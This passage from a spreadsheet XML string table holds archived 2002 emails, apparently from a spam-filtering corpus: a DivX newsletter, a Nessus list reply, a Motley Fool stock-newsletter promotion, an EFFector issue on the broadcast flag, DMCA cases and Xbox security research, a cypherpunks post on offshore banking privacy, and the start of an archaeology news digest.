  design--keeping it real. Submitted by "DIVX Budman."
* More DivX: Who doesn't want more DivX? A very colorful, very
  circular design submitted by one of our old favorite skin authors:
  "JC."
* Luxury: Live the good life with this high-class, luxurious gold
  skin. Submitted by "scoj."
  For all the new skins, check out the DivX Skins section:
  . If you'd like to make your own skin,
  read the "How to Create a Skin" page:
  .
    That's all we have for you this week. Thanks for supporting DivX
  video. Please feel free to send us any comments and suggestions
  at .
  Until next time,
  The DivX Team
  P.S. If you have friends that you think would enjoy receiving
  this newsletter, please forward this message on to them.--
Copyright(c) 2002 DivXNetworks, Inc. All rights reserved.
DivX is a trademark of DivXNetworks, Inc.
This newsletter is sent weekly to over 1,600,000 opt-in subscribers.
If you are interested in advertising in the DivX News, write us at
.This newsletter is sent from an automated account. Replies to this
message will not be read. Please follow the unsubscribe
instructions below if you do not want to receive this newsletter
in the future.If you do not wish to receive future newsletters, you can
unsubscribe by visiting 
and entering your email address. Alternately, you can send an
email message to  and be removed
from the list.---------- Your email is protected by Mailshell ---------- 
As you requested, this email was forwarded to you by Mailshell.
Mailshell will forward your replies to this email and keep your
private email address safe.To unsubscribe safely and easily using Mailshell or to stop forwarding:
http://www.mailshell.com/control.html?a=b_fa37eeq98z1xl2zjr74cp11v559ad52admzReturnPath.net http://rd.mailshell.com/ad481
Earn up to $3 for each of your friends who signs up with Mailshell! http://rd.mailshell.com/sp5
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Seriously though, it spurs the question: should this list be moderated ? 
&gt; (and the next question: if "yes", who wants to co-moderate ?)
No...the list has been on target i'd say about 95% of the time.
Iff it starts being a problem, consider it. Right now, John's
right - this remove thread is taking more time than any remove
requests have in the entire past year.One thing you may want to consider (if feasible) - BugTraq's
adopted a technique by which they add headers to each message
indicating where to email to remove. The catch: the mail is
not sent to "majordomo" - it is sent to "listname-remove"@domain.
I've found that useful when I can't remember exactly which mail
addr I used to signup (since my email addr never shows up in
a received message, and I have multiple addresses going to the
same box).For all that, remember, even if you put the actual removal
instructions right in the bottom of your email, you will
_still_ get the clueless asking you how to remove. (Trust me,
we've been there.)Thomas-
nessus@list.nessus.org: general discussions about Nessus.
* To unsubscribe, send a mail to majordomo@list.nessus.org with
"unsubscribe nessus" in the body.
</t>
  </si>
  <si>
    <t xml:space="preserve">You are receiving this email because you signed up to 
receive one of our free reports. If you would prefer 
not to receive messages of this type, please 
unsubscribe by following the instructions at the 
bottom of this message.Dear Fool,Just before Enron plunged......16 of 17 Wall Street analysts were still urging you 
to buy Enron's stock.  While the company piled up debt 
and manufactured imaginary earnings, auditors gave the 
balance sheet a big thumbs-up.  As investors lost 
everything, Enron insiders pocketed millions.AND THAT should make every investor's blood boil!Frankly, the Enrons and Global Crossings of the world 
infuriate me.  All the backroom manipulations dirty 
dealing and cover-ups really make it hard to know who 
you can trust.   And that is why we've created a NEW 
investing service, "David &amp; Tom Gardner's Motley Fool 
Stock Advisor" -- to bring the Motley Fool co-founders' 
extraordinary commitment to honest stock analysis, 
fair dealing and complete disclosure to investors like 
you on a regular and timely basis.The Motley Fool, which David and Tom founded back in 
1993, is dedicated to the principle that given the 
right tools...the average guy can find great success in 
every aspect of his financial life.And now, David and Tom are applying this principle -- and 
their extensive investing experience -- to the new 
"Motley Fool Stock Advisor."  But as you'll see, this service isn't just about 
"buying more stocks."  OUR GOAL in publishing the 
"Motley Fool Stock Advisor" is twofold:  To help you 
gain the knowledge, confidence and resolve to make 
money in the U.S. stock market...while avoiding the 
biggest mistakes, as well.The Wall Street analysts touting Global Crossing said 
its worldwide fiber-optics network would make it the 
king of telecom.  Now these shares are WORTH NOTHING.  
Microstrategy was the poster child of the technology 
bubble-after earnings restatements, the stock now sits 
99% OFF its high!  Kmart's lousy inventory management 
and marketing incompetence helped drive the company 
into BANKRUPTCY.WHAT ABOUT Nortel and Lucent-two of America's most 
widely owned stocks.  Will they ever come back?  How 
about AOL?  Does its merger with Time-Warner mean the 
GLORY DAYS are over -- or have they just begun?   Are 90% 
of all telecommunications companies truly in danger of 
disappearing? If so, which will survive? Will great 
old names like JP Morgan, Disney and Motorola recover?  Well, those are the sorts of questions David &amp; Tom 
Gardner can help you answer at the "Motley Fool Stock 
Advisor."  As they say, "Show us the money."  When it comes to 
making promises, fast-talkers can fudge just about 
anything.  But CASH FLOW doesn't lie.YOU CAN avoid a lot of big mistakes by simply making 
sure a company has the cash coming in to pay its 
bills.  And watching cash flow is also one of the best 
ways to identify superstar companies -- far more reliable 
than "earnings" that can be manipulated 8 ways to 
Sunday.  Once you eliminate big losers from the 
equation -- and target the true superstars -- you'll find 
investing more fun...less stressful...and much more 
profitable, as well.So forget about Wall Street's "damaged goods"-
companies that have a boatload of debt and accounting 
woes, as well.  Keep it SIMPLE instead."Simple" means investing in companies that we all -- with 
a little effort -- can understand.  Companies where we 
know what businesses they're really in.  Companies 
where the financial statements actually mean 
something.  And companies easily recognizable as the 
"best of breed."In the free report you received, "The One Stock That 
Keeps Wall Street BUZZING," you read about one of 
David &amp; Tom's very favorite investments: Starbucks.  
Before this company came along, most folks just took 
coffee for granted.  And certainly, no one proposed 
any far-reaching business model built around it.  Yet 
these innovators took a low-margin commodity and built 
a near $3 BILLION company with more than 5000 
retail outfits all around the world.Starbucks has been able to open new outlets based on 
money it has earned from existing ones. That is an 
astounding testament to its economic power.  At The 
Motley Fool Stock Advisor we'll help you find and 
truly understand the great investments, the companies 
with solid balance sheets and real growth prospects.   
Right now we're following companies such as:*America's most prestigious jeweler -- its brand name 
has no rival.  With net margins of 59% on sales of 
$1.6 Billion, this company is a great pick for solid 
returns with low risk.   *This software company commands more than 25% of the 
video game market.  Its shares have returned 6,000% 
since its public debut in 1989.  An investment of 
$5,000 in 1989 is now worth over $300,000.  The video 
game market is expected to double by 2005 with this 
company enjoying the lion's share of the growth.*This premier credit rating company has locked-in 
demand for its reports on the creditworthiness of 
borrowers holding $30 trillion of the world's debt.  
It has a 20-year record of consistent sales and income 
growth and is poised for another stellar year.YOU CAN TRY the "Motley Fool Stock Advisor" for six 
full months 100% RISK-FREE.  If we don't prove its 
worth to you, it doesn't cost you a dime.As a Charter Subscriber, you get the "Motley Fool 
Stock Advisor" delivered to your home each month; a 
monthly, between-issue, e-mail Fool Flash to help you 
take full advantage of breaking news; full use of the 
Motley Fool Stock Advisor subscriber-only Web site, 
featuring current &amp; back newsletter issues...full 
updates on all selected stocks...Q &amp; A...and more; 
plus introductory Special Reports exclusively for new 
subscribers.To join RISK-FREE, as a Charter Subscriber to "David &amp; 
Tom Gardner's Motley Fool Stock Advisor," simply click 
here now:
http://www.ppi-orders.com/index.htm?promo_code=1UE733Sincerely yours,Mike Bell, Publisher
"David &amp; Tom Gardner's Motley Fool Stock Advisor"P.S. Do you like BIG PROFITS?  In 1994, investment 
pros sniffed at America Online's high-flying stock and 
screamed, "Overvalued."  But the Gardners saw three 
things they overlooked: 1) AOL was building the 
premier stop in cyberspace; 2) They had a great 
retention strategy; and 3) Millions of members paying 
$$$ every month.So Tom and David bought it.  And today they're sitting 
on whopping 4,120% gains.  So you see, while they do 
structure their investing strategy to avoid big 
blunders...they do make a lot of money, too.  To try the 
"Motley Fool Stock Advisor" RISK-FREE, click here now:
http://www.ppi-orders.com/index.htm?promo_code=1UE733~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HOW TO UNSUBSCRIBEWe hope this email message is of value to you. If 
however, you do not wish to receive any of our future 
messages, please unsubscribe by going to the following 
web address:http://www.investorplace.com/newunsubscribe.php?q=66527235-1**Note if you unsubscribe by replying to this message 
please use Unsubscribe or Remove in the subject line. Mon Jul 29 17:04:26 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector       Vol. 15, No. 24       August 9, 2002      ren@eff.orgA Publication of the Electronic Frontier Foundation	  ISSN 1062-9424
In the 224th Issue of EFFector:* EFF Submits Letter to FCC Chairman Regarding BPDG Proposal
* Update on Intel Corp. v. Hamidi
* DeCSS Author Johansen's Trial Rescheduled
* Bunnie Presents Paper on XBox Reverse Engineering
* Thanks to DefCon!
* EFF Booth at LinuxWorld
* Deep Links: Baen Books' Releases Reader-Friendly E-Books
* Deep Links: Janis Ian on P2P
* Deep Links: Hometown Paper Discusses Rep. Coble's Support of 
	Berman P2P Hacking Bill
* Administrivia
For more information on EFF activities &amp; alerts: http://www.eff.org/To join EFF or make an additional donation:
http://www.eff.org/support/ EFF is a member-supported nonprofit.
Please sign up as a member today!
--------------------------------------------------------------------* EFF Submits Letter to FCC Chairman Regarding BPDG ProposalThe Honorable Michael K. Powell Chairman Federal Communications
Commission 445 12th Street, S.W. Suite 8C453 Washington, DC 20554
BY FACSIMILE, ELECTRONIC MAIL, AND POSTAL MAILDear Chairman Powell:I am writing to you today in regards to the digital television
Broadcast Flag; specifically, I write in response to Sen. Hollings'
and Representatives Dingell and Tauzin's letters of July 19, which
urged you to mandate the Broadcast Flag proposal outlined in the
final report of the Broadcast Protection Discussion Group.The Electronic Frontier Foundation (EFF) is a donor-supported
non-profit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DMCA-related prosecution.EFF was an active participant in the Broadcast Protection Discussion
Group. We attended the group's meetings and conference calls and
participated in the group's policy and technical mailing-lists. EFF
also maintains a web-site that was and is the only public source of
information on the Broadcast Flag negotiations and proposal. The
site can be found at http://bpdg.blogs.eff.org. EFF devoted
thousands of staff-hours to publicizing the existence and nature of
the BPDG to the public, to civil liberties and consumer-advocacy
groups, and to entrepreneurial companies and software authors whose
products were threatened by the proceedings.When you and I met at Esther Dyson's PC Forum last March, we spoke
briefly about the civil liberties interests that would be undermined
by the Broadcast Protection Discussion Group's mandate. The BPDG
proposal will have grave consequences for innovation, free
expression, competition and consumer interests. Worst of all, it
will add unnecessary complexity and expense to the DTV transition,
compromising DTV adoption itself.As you are aware, technologists have traditionally manufactured
those devices they believed would be successful in the market, often
in spite of the misgivings of rights-holders. From the piano roll to
the PVR, technologists have enjoyed the freedom to ship whatever
products they believe the public will pay for; what's more,
innovation has always thrived best where there were the fewest
regulatory hurdles. NTSC tuners and devices are governed by precious
few regulations, and consequently we see a rich field of products
that interact with them, from the VCR Plus to tuner-cards for PCs to
the PVR. The Broadcast Flag proposal would limit technologists to
shipping those products that met with the approval of MPAA member
companies. No entrepreneur or software author will know, a priori,
whether his innovative DTV product will be legal in the market until
he has gone to the expense of building it and taking it around to
the Hollywood studios for review.Consumers and industry alike have benefitted greatly from the "Open
Source" or "Free Software" movement, in which technologies are
distributed in a form that encourages end-user modification. From
server-software like the web-wide success-story apache, to operating
systems like GNU/Linux, to consumer applications like the Mozilla
browser, Free Software is a powerful force for innovation, consumer
benefit and commercial activity. The BPDG proposal implicitly bans
Free Software DTV applications -- such as the DScaler de-interlacer
and the GNU Radio software-defined radio program -- as these
applications are built to be modified by end-users, something that
is banned under the BPDG proposal. The tamper-resistance component
of the BPDG's "Robustness Requirements" will create and entire class
of illegal software applications, abridging the traditional First
Amendment freedom enjoyed by software authors who create expressive
speech in code form under one of several Free Software/Open Source
licenses.The BPDG nominally set out to create an objective standard, a bright
line that technologists could hew to in order to avoid liability
when deploying their products. However, the end product of the BPDG
was a "standard" that contained no objective criteria for legal
technology; rather, the standard required that new technologies be
approved by MPAA member companies. Not uncoincidentally, the only
technologies that were approved by the MPAA -- and hence the only
legal technologies -- were those produced by the 4C and 5C
consortia, a group of technology companies that acted as the MPAA's
allies throughout the BPDG process. This is an harbinger of the sort
of regime that the BPDG standard will usher in: technology companies
will be able to shut their competitors out of the marketplace by
allying themselves with Hollywood, brokering deals to allow certain
technologies and outlaw others.The marketplace is a proven mechanism for rapidly and efficiently
producing products that increase the value and desirability of new
technologies, such as DTV. A BPDG mandate would subvert the market
for DTV innovation. Competing companies with lower-cost DTV
technology alternatives would be restrained from bringing these to
market if they failed to assuage the MPAA's concerns about
unauthorized redistribution. Furthermore, the universe of
unauthorized-but-lawful uses for DTV programming will be shrunk down
to the much smaller space of explicitly authorized uses. The ability
of the public to make unauthorized-but-lawful uses of television
programming has been an historical force for increasing the value of
broadcast programming, from the VCR to the PVR.Ironically, the inevitable damage that a Broadcast Flag mandate
would do to innovation, competition and consumer interests can only
slow down DTV adoption, by driving up the cost of DTV devices while
reducing the number of desirable features that an open market would
create. If the public is offered less functionality for more money,
they will not flock to DTV.The most disheartening thing about the Broadcast Flag is that there
is neither a strong case that the Broadcast Flag is a necessary tool
for protecting copyright, nor that the Broadcast Flag would be
effective in that role. The existing practice of Internet
infringement of broadcast programming -- analog captures from
devices that satisfy the requirements of the BPDG proposal -- would
not be stopped by the presence of a Broadcast Flag.
Higher-resolution DTV signals will likewise present no challenge to
determined infringers, who can capture full-quality analog signal
from DTV devices and then re-digitize them, suffering only a single
generation's worth of loss-of-quality before the programming enters
the Internet.Meanwhile, the underlying rubric for a Broadcast Flag -- that
infringement will undermine Hollywood's business to the point that
movies will no longer be available to the public, reducing the value
of DTV -- is no more than superstition. No credible study or
analysis, undertaken by a neutral party, has ever been presented to
Congress, the FCC, the CPTWG or the BPDG supporting this notion. The
public is being asked to sacrifice its rights in copyright; industry
is being asked to place its right to innovation in the hands of
entertainers; the US government is being asked to mandate
extraordinary, unprecedented regulation of the $600 billion
technology sector -- all on the uncorroborated opinions of a few
studio executives.EFF welcomes the FCC's oversight of the Broadcast Flag issue. The
BPDG proceedings took place behind a shroud of secrecy, in a
looking-glass "public process" where only those participants the
organizers wanted to hear from were made privy to its existence,
where the co-chairs invented rules and processes on the fly to suit
the needs of the entertainment interests and the technology
companies that had privately secured a promise of a legal monopoly
for their products, where the press was banned.The FCC has an admirable tradition of seeking and weighing public
opinion in its proceedings. As the FCC considers the Broadcast Flag,
EFF hopes that it will start anew, setting aside the findings of the
BPDG in light of the concerns raised by Microsoft, Philips, Sharp,
Thomson, and Zenith, as well as non-profit organizations including
EFF, Consumers Union, Consumer Federation of America, the Free
Software Foundation, Public Knowledge, digitalconsumer.org, the
Center for Democracy in Technology, and the Computer and
Communications Industry Association.Thank you for attention in this matter. Please let me know if we can
be of any further assistance to you.Sincerely yours,Cory Doctorow for the Electronic Frontier FoundationLinks: EFF's BPDG Blog: 
http://bpdg.blogs.eff.org An overview of our concerns with the broadcast flag:
http://bpdg.blogs.eff.org/archives/one-page.pdf Letter from Sen. Hollings: 
http://bpdg.blogs.eff.org/archives/000155.html Letter from Rep. Tauzin: 
http://bpdg.blogs.eff.org/archives/000156.html
--------------------------------------------------------------------* Update on Intel Corp. v. HamidiIntel Corp. v. Hamidi is now on appeal to the California Supreme
Court. EFF filed an amicus brief in support of Ken Hamidi on Aug. 6,
2002. The facts are simple: Over about two years, Hamidi on six
occasions sent e-mail critical of Intel's employment practices to
between 8,000 and 35,000 Intel employees. Intel demanded that Hamidi
stop, but he refused. Intel obtained an injunction barring Hamidi
from e-mailing Intel employees at their Intel e-mail addresses,
based on the common-law tort of "trespass to chattels." ("Chattel"
is a legal term that refers to personal property, as opposed to
property in land.)EFF's amicus brief argues three main points.(1) Intel did not qualify for relief under "trespass to chattels"
because Intel's e-mail servers were not themselves harmed by
Hamidi's e-mails. If Intel was harmed, it was because the content of
Hamidi's e-mails affected Intel employees, not because sending the
e-mails affected the functioning of Intel's servers.(2) By focusing on unwanted "contact" with the chattel and ignoring
the harm requirement, the court of appeal turned "trespass to
chattels" into a doctrine that threatens common Internet activity
like search engines and linking. For example, if a website posted a
"no trespassing" sign, any "contact" by a search engine could be
considered a trespass even if it caused no harm.(3) The court of appeal wrongly held that the injunction did not
infringe Hamidi's freedom of speech. The First Amendment limits
private parties' legal remedies in many areas of law, such as libel,
out of concern that private parties will use the law to suppress
criticism. The same principle should apply here, where Intel's
claims of harm stem from the meaning of Hamidi's speech.
Links: The Intel v. Hamidi Archive:http://www.eff.org/Cases/Intel_v_Hamidi/- end ---------------------------------------------------------------------* DeCSS Author Johansen's Trial RescheduledThe trial of Norwegian teen Jon Johansen, who created the
controversial DeCSS software, has been pushed back again. It is now
scheduled to be heard on December 9, 2002, in Oslo, Norway. In the
fall of 1999, Johansen and his team reverse-engineered the content
scrambling system (CSS) software used to encrypt DVDs in an effort
to build a DVD player for the Linux operating system. In January of
2002, the Norwegian Economic Crime Unit (OKOKRIM) charged Johansen
with a violation of Norwegian Criminal Code Section 145.2, which
outlaws breaking into a third-party's property in order to steal
data that one is not entitled to. This prosecution marks the first
time the law will be used to prosecute a person for accessing his
own property (his own DVD). Johansen faces two years in prison if
convicted. The prosecution is based on a formal complaint filed by
the Motion Picture Association.The trial had originally been scheduled to take place in June of 
2002 but was rescheduled when the court could not find any qualified 
judges to hear Johansen's case.  Now the case is scheduled to be 
heard by a three-judge panel. Help Jon in his battle against 
Hollywood movie studios, donate to his legal defense fund at: http://www.eff.org/support/jonfund.htmlLinks: The DeCSS/Johansen Archive:
http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/Digital Rights Management Archive: 
http://www.eff.org/IP/DRM/- end ---------------------------------------------------------------------* Bunnie Presents Paper on XBox Reverse EngineeringPaper Explains Flaw in Videogame Security SystemResearcher Escapes Chilling Effect of Digital Copyright LawElectronic Frontier Foundation Media AdvisoryFor Immediate Release: Thursday, August 9, 2002San Francisco - The Electronic Frontier Foundation (EFF) is pleased
to announce that former MIT doctoral student Andrew "Bunnie" Huang
will present a paper explaining a security flaw in the Microsoft
Xbox (TM) videogame system.Huang will present his paper, "Keeping Secrets in Hardware: the
Microsoft X-BOX Case Study," at 5:25 p.m. PDT on August 13, 2002, at
the 2002 Workshop on Cryptographic Hardware and Embedded Systems
(CHES 2002) in Redwood City, California (Aug. 13-15, 2002).The Xbox security system is intended to allow people to play only
videogames authorized by Microsoft. Huang's paper "shows how a
person could defeat that system with a small hardware investment,"
said MIT Professor Hal Abelson, one of Huang's advisors. "More
importantly, the paper relates the security vulnerability to a
general design flaw shared by other high-profile security systems
such as the government's Clipper Chip and the movie industry's
Contents Scrambling System (CSS) for DVD players."Huang contacted EFF in March after his advisors told him that his
preliminary findings raised potentially significant legal questions.
With the help of Boston College law professor Joe Liu, EFF worked
with Huang, Abelson, and MIT administrators to analyze the legal
issues and draft letters notifying Microsoft of Huang's research
findings and intended publication, one of the steps encouraged by
Digital Millennium Copyright Act (DMCA).Microsoft told Huang and Abelson that while it might prefer that the
paper not be published, it would be inappropriate to ask MIT to
withhold the paper."Microsoft deserves praise for making no attempt to control
publication," said Abelson. "Their response shows that they value
academic freedom, and that they appreciate the critical role of
unfettered research and publication in advancing technology."Other companies have reacted otherwise, using the DMCA to threaten
researchers. The Recording Industry Association of America last year
warned Princeton Professor Edward Felten after his research team
exposed weaknesses in digital music security technologies. Last
month, Hewlett Packard (HP) threatened research collective SnoSoft
over exposing a security vulnerability in HP's Tru64 Unix operating
system. Soon after, HP clarified that it would not use the DMCA to
stifle research or impede the flow of information that would improve
computer security.Huang said that while he is glad he can openly present his paper,
"The DMCA clearly had a chilling effect on my work. I was afraid to
submit my research for peer review until after the EFF's efforts to
clear potential legal restraints.""Researchers should be analyzing security, not worrying about
getting sued," said EFF Senior Staff Attorney Lee Tien.Links:For this release:
http://www.eff.org/IP/DMCA/20020808_eff_bunnie_pr.htmlFor Huang's paper:
ftp://publications.ai.mit.edu/ai-publications/2002/AIM-2002-008.pdfFor the CHES program: http://islab.oregonstate.edu/ches/program.htmlEFF "Unintended Consequences: Three Years Under the DMCA" report:
http://www.eff.org/IP/DMCA/20020503_dmca_consequences.pdfRIAA sues Professor Edward Felten over SDMI:
http://www.eff.org/Legal/Cases/Felten_v_RIAA/An article about Hewlett-Packard's threatening SnoSoft:
http://www.wired.com/news/technology/0,1282,54297,00.html- end ---------------------------------------------------------------------* EFF Thanks DefconEFF thanks The Dark Tangent and other organizers of the DEF CON X
convention for their generous donation of exhibition space at DEF
CON (http://www.defcon.org/). DEF CON is an "underground" computer
security conference held each summer in Las Vegas.Links: Defcon Website: 
http://www.defcon.com/- end ---------------------------------------------------------------------* EFF Booth at LinuxWorldCome visit EFF at booth #488 at Linuxworld next week. We'll be
passing out information, good cheer, and a slew of new stickers.When: August 13 - 15
	10a - 5pWhere: Booth #5
	Moscone Center 
	747 Howard Street
	San Francisco, CA 94103Links: LinuxWorld Conference Website: 
http://www.linuxworldexpo.com/Floor Map and EFF Booth:
http://www.linuxworldexpo.com/linuxworldexpo/v31/floorplan/floorplan
.cvn?b=97&amp; exbID=50- end ---------------------------------------------------------------------Deep Links Deep Links is a new department in the EFFector featuring noteworthy 
news-items, victories and threats from around the Internet.
* Baen Books expands fair-use-friendly e-book programBaen Books will bind a CD-ROM into the October 2002 hardcover
edition of *War of Honor,* the latest volume in David Weber's epic
Honor Harrington space-opera. The CD will contain at least 22
complete novels, all in open formats like html and RTF, with the
fair-use-friendly admonishment "This disk and its contents may be
copied and shared but NOT sold." Included on the disk are the entire
Honor Harrington series to date, as well as other titles from the
Baen line, including Keith Laumer's *Retief!* and Larry Niven and
Jerry Pournelle's *Fallen Angels*.Baen has been a banner-carrier for fair-use in electronic
publishing, shipping text and html files that can be played on a
multitude of devices. Other publishers have chosen to publish their
material in copy-controlled formats that make it impossible to
legally loan or resell the titles you purchase, are locked to a
specific device, can't play on every operating system, and
occasionally lock out assistive technology like the screen-readers
employed by the blind.Dmitry Skylarov, a Russian scientist, was arrested in July 2001, for
demonstrating how end-users could defeat the copy-prevention
employed by Adobe's e-book technology. Adobe asked the FBI to arrest
Skylarov for violating the Digital Millennium Copyright Act (DMCA),
which makes it a crime to describe techniques for circumventing
copy-prevention technology. Though Skylarov was later released, his
employer, ElcomSoft, is still facing charges in the USA, and the
Russian government has issued an advisory warning Russian scientists
to steer clear of American technical conferences until the DMCA is
repealed.Here is Baen's statement on the CD release:You are about to start playing with a CD-ROM that has fairly
extraordinary content. As of this writing it includes twenty-two
UNENCRYPTED novels in several formats, the ten Honor Harrington
Novels, 3 Honor Harrington Anthologies and 9 novels by friends of
Honor, and by the time of distribution it may well contain more.
(More than twenty novels for free, and with no stupid codes to work
around. Think of that.) The reason for the plethora of formats is to
try to please the people who want to read the novels on their Palm
Pilots or other text-specialized palm-sized devices.Links:Baen Books's page for *War of Honor*:
http://www.baen.com/orientation.htmSlashdot discussion of *War of Honor* release:
http://slashdot.org/article.pl?sid=02/08/03/2314232&amp;mode=flat&amp;tid=
149EFF documents on Dmitry Skylarov and ElcomSoft:
http://www.eff.org/IP/DMCA/US_v_Elcomsoft/EFF documents on the Digital Millennium Copyright Act (DMCA):
http://www.eff.org/IP/DMCA/- end -* Singer/Songwriter Janis Ian on P2P Lucid article on the benefits of
peer-to-peer networks form an artists' perspective.
http://www.janisian.com/article-internet_debacle.html- end -* Hometown Paper Discusses Rep. Coble's Support of Berman P2P Hacking
Bill Column on how a good Representative can make a bad call.
http://www.news-record.com/news/columnists/staff/cone04.htm- end -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plese visit:
http://action.eff.org/subscribe/. &gt;&gt;From there, you can update all your information. If you have already 
subscribed to the EFF Action Center, please visit:
http://action.eff.org/action/login.asp.(Please ask ren@eff.org to manually remove you from the list if this
does not work for you for some reason.)Back issues are available at: 
http://www.eff.org/effectorTo get the latest issue, send any message to
effector-reflector@eff.org (or er@eff.org), and it will be mailed to
you automatically. You can also get it via the Web at:
http://www.eff.org/pub/EFF/Newsletters/EFFector/current. html
++++++++++++++++++++++++
You received this message because qqqqqqqqqqs-eff@spamassassin.taint.org is a member of 
the mailing list originating from alerts@action.eff.org. To unsubscribe from 
all mailing lists originating from alerts@action.eff.org, send an email to 
alerts@action.eff.org with "Remove" as the only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
BlogStart: **Cypherpunks**: Tax havens and offshore islands are not quite as ''free''
-- at least in terms of personal liberties -- as people might think.  R.
A. Hettinga tells some stories about ''Triumph, the Fabulous
Crotch-Sniffing Caymanian Customs Wonder Dog, ... and (the Cayman-born
expat's kid) who was literally exiled from the island when the island
constabulary "discovered" a marijuana seed or three in his summer-break
rental car a few years back.''I guess it's back to the oil rigs then ;)BlogEnd: 
LinkText: tells some stories------- Forwarded MessageDate:    Sun, 11 Aug 2002 12:31:56 -0400
From:    "R. A. Hettinga" 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At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credit-card and securities clearing, or the odd governmental or
quango re-org, like they are wont to do increasingly in the EU, and
the US.As a result, the veil of secrecy went in Switzerland quite a while
ago. The recent holocaust deposit thing was just the bride and groom
on that particular wedding-cake, and, as goes Switzerland, so goes
Luxembourg, and of course Lichtenstein, which itself is usually
accessible only through Switzerland. Finally, of course, the Caymans
themselves will cough up depositor lists whenever Uncle comes calling
about one thing or another on an increasingly longer list of fishing
pretexts.At this point, the "legal", state-backed pecuniary privacy pickings
are kind of thin on the ground. I mean, I'm not sure I'd like to keep
my money in, say, Vanuatu. Would you? Remember, this is a place where
a bandana hanging on a string across an otherwise public road will
close it down until the local erst-cannibal hunter-gatherer turned
statutorily-permanent landowner figures out just what his new or
imagined property rights are this afternoon.
The point is, any cypherpunk worth his salt will tell you that only
solution to financial or any other, privacy, is to make private
transactions on the net, cheaper, and more secure, than "transparent"
transactions currently are in meatspace. Then things get *real*
interesting, and financial privacy -- and considerably more personal
freedom -- will just be the icing on the wedding cake. Bride and
groom action figures sold separately, of course.Cheers,
RAH
(Who went to FC2K at the Grand Cayman Marriott in February that year.
Nice place, I liked Anguilla better though, at least at the time, and
I haven't been back to either since. The beaches are certainly better
in Anguilla, and the "private" banking system there is probably just
as porous as Cayman's is, by this point. If I were to pick up and
move Somewhere Free outside Your Friendly Neighborhood Unipolar
Superpower, New Zealand is somewhere near the top of my list, and
Chile would be next, though things change quickly out there in
ballistic-missile flyover country. In that vein, who knows, maybe
we're in for some kind of latter-day Peloponnesian irony, and
*Russia* will end up the freest place on earth someday. Stranger
things have happened in the last couple of decades, yes?)-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPVYS48PxH8jf3ohaEQKwtgCgw/XSwzauabEP/8jDvUVk/rgFdroAn0xf
Owk90GoK+X5Pv+bGoKXCwzBK
=1w9d
-----END PGP SIGNATURE-------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</si>
  <si>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 xml:space="preserve">================================================================
explorator 5.15                                  August 15, 2002
================================================================
Editor's note: Depending on your mail software, some urls may
wrap (especially those from the Telegraph) which will require
you to rebuild the url at your end; if you get a 'file not
found', check to see if the url wrapped on you. Most urls should
be active for at least eight hours from the time of publication.
================================================================
================================================================Thanks to Bill Thayer, Ross Sargent, 'Salinas17', Michael Ruggieri,
Maurice O'Sullivan, Terry Gibson, 'mb2400', Bill Kennedy, Paul James
Cowie, Arthur Shippee, Joseph Nicholas, W. Richard Frahm,'alesmonetos',
and Sally Winchester for headses upses this week (a.a.h.i.h.l.n.o.o.)n.b. Last week I carelessly suggested the team which had claimed
to have found El Dorado was Polish; it is, in fact, an international
team led by a "Polish-Italian" journalist/explorer. Apologies for
any confusion this may have caused.================================================================
================================================================
AFRICA, EUROPE, AND ASIA
================================================================
John Noble Wilford attempts to clarify the Chadian skull thing:http://www.nytimes.com/2002/08/06/science/06SKUL.htmlIn the what-can-DNA-tell-us-about-antiquity department, the latest
suggestion is that there is genetic evidence "middle easter farmers
'civilised' Europe":http://www.newscientist.com/news/news.jsp?id=ns99992634
http://portal.telegraph.co.uk/news/main.jhtml?xml=%2Fnews%2F2002%2F08%2F06%2Fngene06.xmlA log boat which might date to 3000 B.C. has been found off the
coast of Ireland:http://www.ireland.com/newspaper/ireland/2002/0805/2854861586HM2LOGBOAT.html
http://www.unison.ie/irish_independent/index.php3?ti=41&amp;ca=9&amp;si=801897&amp;issue_id=7825The Cerne Abbas Giant was recently, er, 'defaced' (not permanently ...
potentially offensive content in this one):http://story.news.yahoo.com/news?tmpl=story2&amp;u=/nm/20020806/od_nm/sex_dc_1Satellite technology has revealed a prehistoric site near
Northumberland:http://news.bbc.co.uk/2/hi/england/2178530.stm... and a prehistoric cemetery has been found near Cheshire:http://www.ananova.com/news/story/sm_644681.htmlThey're still making significant finds in the 'workers village'near
the pyramids:http://news.nationalgeographic.com/news/2002/08/0805_020805_giza.htmlGulf News has a nice feature on the alignment of a Dilmun temple at
Saar:http://www.gulf-daily-news.com/arc_Articles.asp?Article=29638&amp;Sn=BNEW&amp;IssueID=25142Plenty of coverage of a story on Bronze Age 'drug trade':http://www.abcnews.go.com/wire/World/ap20020807_922.html
http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020808/ap_wo_en_po/israel_ancient_narcotics_1
http://stacks.msnbc.com/news/791265.asp
http://europe.cnn.com/2002/WORLD/meast/08/08/ancientnarcotics.ap/index.html
http://www.jpost.com/servlet/Satellite?pagename=JPost/A/JPArticle/ShowFull&amp;cid=1028814634905The Egyptian Museum in Cairo will be marking its centennial by
hauling up a bunch of never-before-seen artifacts from the basement:http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20020805/sc_nm/leisure_egypt_museum_dc_1
http://www.chron.com/cs/CDA/story.hts/world/1522113Another piece on politics and archaeology in the Holy Land:http://www.orlandosentinel.com/news/nationworld/orl-asecisraeldig04080402aug04.story... while archaeologists seem to be quietly excavating a Byzantine
monastery in Gaza:http://www.ekathimerini.com/4dcgi/news/content.asp?aid=19621A first century cemetery has come to light near Palmyra:http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020809/ap_wo_en_ge/syria_archaeology_1A human-size statue of Baal Addir was recently revealed in a Sardinian
context:http://www.news.com.au/common/story_page/0,4057,4855902%255E1702,00.htmlA Celtic Iron Age fort in Wales is "revealing its secrets":http://news.bbc.co.uk/2/hi/wales/2178489.stmA large number of Eastern Zhou Dynasty tombs have been found in
China:http://news.xinhuanet.com/english/2002-08/10/content_519198.htm... as has an important tomb of an aristocrat:http://www1.chinadaily.com.cn/news/lf/2002-08-11/81655.htmlFour Buddhas have been found hidden inside another Buddha rarely
